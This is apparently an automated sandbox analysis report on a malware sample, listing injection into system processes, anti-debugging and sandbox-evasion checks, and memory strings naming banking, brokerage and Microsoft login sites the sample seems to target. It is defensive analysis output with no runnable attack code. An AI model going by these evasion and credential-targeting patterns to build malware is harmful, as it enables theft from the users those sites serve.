                Source: Binary string: wntdll.pdbUGP source: Fi#U015f.exe, 00000000.00000003.2080229559.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2080827454.0000000003470000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460035466.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458092933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2554333146.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.000000000461E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2552233652.0000000004120000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.0000000004480000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Fi#U015f.exe, 00000000.00000003.2080229559.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2080827454.0000000003470000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2460035466.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458092933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2554333146.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.000000000461E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2552233652.0000000004120000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.0000000004480000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000002.00000002.2552129774.0000000002619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552114339.0000000002600000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302819959.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000002.00000002.2552129774.0000000002619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552114339.0000000002600000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302819959.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000006.00000002.3304456237.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3302124025.0000000000696000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625798931.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.00000000338DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000006.00000002.3304456237.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3302124025.0000000000696000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625798931.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.00000000338DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Fi#U015f.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Fi#U015f.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Fi#U015f.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Fi#U015f.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Fi#U015f.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5E01E LoadLibraryA,GetProcAddress,0_2_00E5E01E
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E66B05 push ecx; ret 0_2_00E66B18
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00BC4FB8 push eax; retf 0_2_00BC4FD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02158267 push ds; retf 2_2_02158282
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02143290 push eax; ret 2_2_02143292
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021542D0 push ds; ret 2_2_021542D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02145B87 push es; iretd 2_2_02145B88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02154BEB push FFFFFFB6h; ret 2_2_02154BED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214D8AE push ss; ret 2_2_0214D8AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0215719B push ds; iretd 2_2_0215719C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02142184 push ds; ret 2_2_021421DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021566D3 push ebp; iretd 2_2_02156798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021566FD push ebp; iretd 2_2_02156798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02153C24 push edi; retf 2_2_02153C2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02164C23 push ds; ret 2_2_02164CC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0216DCC3 push ss; retf 2_2_0216DCF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02166D03 push edi; ret 2_2_02166D0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021585D5 push edi; iretd 2_2_021585E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D309AD push ecx; mov dword ptr [esp], ecx2_2_02D309B6
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D5828A push ds; ret 4_2_02D5832D
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4728B push edi; retf 4_2_02D47293
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D48252 push FFFFFFB6h; ret 4_2_02D48254
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4E0DC push edx; retf 4_2_02D4E10B
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4B8CE push ds; retf 4_2_02D4B8E9
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4E0A8 push edx; retf 4_2_02D4E10B
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4A802 push ds; iretd 4_2_02D4A803
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D391EE push es; iretd 4_2_02D391EF
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D40F15 push ss; ret 4_2_02D40F16
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4BC3C push edi; iretd 4_2_02D4BC4B
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D49D64 push ebp; iretd 4_2_02D49DFF
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D49D3A push ebp; iretd 4_2_02D49DFF
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EA8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EA8111
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E5EB42
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E6123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E6123A
                Source: C:\Users\user\Desktop\Fi#U015f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Fi#U015f.exeAPI/Special instruction interceptor: Address: BC4644
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: Fi#U015f.exe, 00000000.00000002.2086447571.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2060053878.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2060184065.0000000000B05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEOR<
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7096E rdtsc 2_2_02D7096E
                Source: C:\Windows\SysWOW64\icsunattend.exeWindow / User API: threadDelayed 4207Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeWindow / User API: threadDelayed 5765Jump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeEvaded block: after key decisiongraph_0-94207
                Source: C:\Users\user\Desktop\Fi#U015f.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94747
                Source: C:\Users\user\Desktop\Fi#U015f.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 4580Thread sleep count: 4207 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 4580Thread sleep time: -8414000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 4580Thread sleep count: 5765 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 4580Thread sleep time: -11530000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe TID: 1788Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\icsunattend.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E86CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E86CA9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00E860DD
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00E863F9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E8EB60
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E8F5FA
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8F56F FindFirstFileW,FindClose,0_2_00E8F56F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E91B2F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E91C8A
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E91F94
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E5DDC0
                Source: 2780E4D.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 2780E4D.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 2780E4D.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: firefox.exe, 00000008.00000002.2845353517.000002713378C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYYe
                Source: 2780E4D.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 2780E4D.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 2780E4D.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 2780E4D.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 2780E4D.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 2780E4D.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: icsunattend.exe, 00000006.00000002.3302124025.0000000000696000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3303465760.0000000000949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2780E4D.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 2780E4D.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 2780E4D.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 2780E4D.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 2780E4D.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 2780E4D.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 2780E4D.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 2780E4D.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 2780E4D.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 2780E4D.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Fi#U015f.exeAPI call chain: ExitProcess graph end nodegraph_0-94496
                Source: C:\Users\user\Desktop\Fi#U015f.exeAPI call chain: ExitProcess graph end nodegraph_0-93416
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7096E rdtsc 2_2_02D7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02157923 LdrLoadDll,2_2_02157923
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E96AAF BlockInput,0_2_00E96AAF
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E43D19
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E73920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00E73920
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5E01E LoadLibraryA,GetProcAddress,0_2_00E5E01E
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00BC3270 mov eax, dword ptr fs:[00000030h]0_2_00BC3270
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00BC48B0 mov eax, dword ptr fs:[00000030h]0_2_00BC48B0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00BC4910 mov eax, dword ptr fs:[00000030h]0_2_00BC4910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E284 mov eax, dword ptr fs:[00000030h]2_2_02D6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E284 mov eax, dword ptr fs:[00000030h]2_2_02D6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402A0 mov eax, dword ptr fs:[00000030h]2_2_02D402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402A0 mov eax, dword ptr fs:[00000030h]2_2_02D402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A250 mov eax, dword ptr fs:[00000030h]2_2_02D2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36259 mov eax, dword ptr fs:[00000030h]2_2_02D36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA250 mov eax, dword ptr fs:[00000030h]2_2_02DEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA250 mov eax, dword ptr fs:[00000030h]2_2_02DEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB8243 mov eax, dword ptr fs:[00000030h]2_2_02DB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB8243 mov ecx, dword ptr fs:[00000030h]2_2_02DB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2826B mov eax, dword ptr fs:[00000030h]2_2_02D2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2823B mov eax, dword ptr fs:[00000030h]2_2_02D2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02DDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD43D4 mov eax, dword ptr fs:[00000030h]2_2_02DD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD43D4 mov eax, dword ptr fs:[00000030h]2_2_02DD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC3CD mov eax, dword ptr fs:[00000030h]2_2_02DEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
